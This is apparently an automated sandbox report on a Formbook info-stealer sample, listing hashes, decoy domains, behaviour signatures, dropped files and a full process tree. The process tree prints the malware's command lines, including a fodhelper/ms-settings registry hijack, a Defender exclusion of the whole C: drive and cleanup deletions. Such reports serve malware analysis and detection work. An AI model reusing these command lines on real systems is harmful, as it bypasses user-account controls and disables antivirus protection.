Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-07-2024 14:23

General

  • Target

    839098d2b42765abf8c1066900745e03a0da338c.exe

  • Size

    1.6MB

  • MD5

    58f6371fad0f06a8c78026ca2d44e7ee

  • SHA1

    839098d2b42765abf8c1066900745e03a0da338c

  • SHA256

    42039b6edc8a92257987047991f1c99eac490366de4e22ff5f0c3fd8fa31135a

  • SHA512

    d59565f0cf902ed54d5cacceff3f29ec78f824c792d5ae75677f26efec825187f0b6356b70a3005df9d8015904fb4c8398c8e499659c2168fccd77a976736aaa

  • SSDEEP

    24576:1Hb5Bli50xv2T4EM9X0cjRjFmhco/ZyFvaZjeCi8DI/fdKFZA16GSbxpSA07YN3O:9b5W+uWRhKV4FceCxyKFZo

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

dn03

Decoy

almouranipainting.com

cataloguia.shop

zaparielectric.com

whcqsc.com

ioco.in

aduredmond.com

vavada611a.fun

humtivers.com

jewellerytml.com

mcapitalparticipacoes.com

inhlcq.shop

solanamall.xyz

moviepropgroup.com

thegenesis.ltd

cyberxdefend.com

skinbykoco.com

entermintlead.com

honestaireviews.com

wyclhj7gqfustzp.buzz

w937xb.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 20 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3548
    • C:\Users\Admin\AppData\Local\Temp\839098d2b42765abf8c1066900745e03a0da338c.exe
      "C:\Users\Admin\AppData\Local\Temp\839098d2b42765abf8c1066900745e03a0da338c.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4736
      • C:\Users\Public\Libraries\fyzvilfB.pif
        C:\Users\Public\Libraries\fyzvilfB.pif
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\82E7.tmp\82E8.tmp\82F8.bat C:\Users\Public\Libraries\fyzvilfB.pif"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3436
          • C:\Windows\System32\extrac32.exe
            C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
            5⤵
              PID:4452
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
              5⤵
              • Executes dropped EXE
              PID:2896
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
              5⤵
              • Executes dropped EXE
              PID:1336
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3212
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                6⤵
                  PID:3972
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2968
                • C:\Windows\system32\extrac32.exe
                  extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                  6⤵
                    PID:3764
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3780
                  • C:\Windows\system32\extrac32.exe
                    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                    6⤵
                      PID:4600
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4000
                    • C:\Users\Public\xkn.exe
                      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                      6⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1232
                      • C:\Users\Public\alpha.exe
                        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3320
                        • C:\Users\Public\ger.exe
                          C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                          8⤵
                          • Executes dropped EXE
                          • Modifies registry class
                          PID:4392
                  • C:\Windows \System32\per.exe
                    "C:\\Windows \\System32\\per.exe"
                    5⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:2272
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4940
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM SystemSettings.exe
                      6⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3312
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3976
                    • C:\Windows\system32\PING.EXE
                      ping 127.0.0.1 -n 2
                      6⤵
                      • Runs ping.exe
                      PID:4356
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                    5⤵
                    • Executes dropped EXE
                    PID:4336
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                    5⤵
                    • Executes dropped EXE
                    PID:860
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                    5⤵
                    • Executes dropped EXE
                    PID:1912
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
                    5⤵
                    • Executes dropped EXE
                    PID:4880
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                    5⤵
                    • Executes dropped EXE
                    PID:1604
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                    5⤵
                    • Executes dropped EXE
                    PID:4744
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                    5⤵
                    • Executes dropped EXE
                    PID:4248
              • C:\Windows\SysWOW64\extrac32.exe
                C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\839098d2b42765abf8c1066900745e03a0da338c.exe C:\\Users\\Public\\Libraries\\Bflivzyf.PIF
                3⤵
                  PID:1200
                • C:\Windows\SysWOW64\colorcpl.exe
                  C:\Windows\System32\colorcpl.exe
                  3⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1620
              • C:\Windows\SysWOW64\cscript.exe
                "C:\Windows\SysWOW64\cscript.exe"
                2⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                PID:3876
                • C:\Windows\SysWOW64\cmd.exe
                  /c del "C:\Windows\SysWOW64\colorcpl.exe"
                  3⤵
                    PID:664
              • C:\Windows\system32\SystemSettingsAdminFlows.exe
                "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                1⤵
                  PID:4024

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\82E7.tmp\82E8.tmp\82F8.bat

                  Filesize

                  1KB

                  MD5

                  e62f427202d3e5a3ba60ebe78567918c

                  SHA1

                  6ef0cd5ba6c871815fceb27ff095a7931452b334

                  SHA256

                  06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff

                  SHA512

                  e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kzfwe1yw.ttf.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Public\Libraries\fyzvilfB.pif

                  Filesize

                  66KB

                  MD5

                  c116d3604ceafe7057d77ff27552c215

                  SHA1

                  452b14432fb5758b46f2897aeccd89f7c82a727d

                  SHA256

                  7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

                  SHA512

                  9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

                • C:\Users\Public\alpha.exe

                  Filesize

                  283KB

                  MD5

                  8a2122e8162dbef04694b9c3e0b6cdee

                  SHA1

                  f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                  SHA256

                  b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                  SHA512

                  99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                • C:\Users\Public\ger.exe

                  Filesize

                  75KB

                  MD5

                  227f63e1d9008b36bdbcc4b397780be4

                  SHA1

                  c0db341defa8ef40c03ed769a9001d600e0f4dae

                  SHA256

                  c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

                  SHA512

                  101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

                • C:\Users\Public\xkn.exe

                  Filesize

                  442KB

                  MD5

                  04029e121a0cfa5991749937dd22a1d9

                  SHA1

                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                  SHA256

                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                  SHA512

                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                • C:\Windows \System32\per.exe

                  Filesize

                  48KB

                  MD5

                  85018be1fd913656bc9ff541f017eacd

                  SHA1

                  26d7407931b713e0f0fa8b872feecdb3cf49065a

                  SHA256

                  c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

                  SHA512

                  3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

                • memory/1232-50-0x000001BE733C0000-0x000001BE733E2000-memory.dmp

                  Filesize

                  136KB

                • memory/1620-87-0x00000000053B0000-0x00000000063B0000-memory.dmp

                  Filesize

                  16.0MB

                • memory/1620-86-0x00000000053B0000-0x00000000063B0000-memory.dmp

                  Filesize

                  16.0MB

                • memory/1620-83-0x00000000053B0000-0x00000000063B0000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3548-91-0x000000000A8C0000-0x000000000A9B6000-memory.dmp

                  Filesize

                  984KB

                • memory/3788-16-0x0000000000400000-0x000000000041A000-memory.dmp

                  Filesize

                  104KB

                • memory/3788-15-0x0000000000400000-0x0000000001400000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3788-77-0x0000000000400000-0x000000000041A000-memory.dmp

                  Filesize

                  104KB

                • memory/3788-75-0x0000000000400000-0x0000000001400000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3788-10-0x0000000000400000-0x0000000001400000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3788-13-0x0000000000400000-0x0000000001400000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3876-88-0x00000000005D0000-0x00000000005F7000-memory.dmp

                  Filesize

                  156KB

                • memory/3876-89-0x00000000001C0000-0x00000000001EF000-memory.dmp

                  Filesize

                  188KB

                • memory/4736-0-0x0000000002340000-0x0000000002341000-memory.dmp

                  Filesize

                  4KB

                • memory/4736-1-0x0000000000400000-0x00000000005A4000-memory.dmp

                  Filesize

                  1.6MB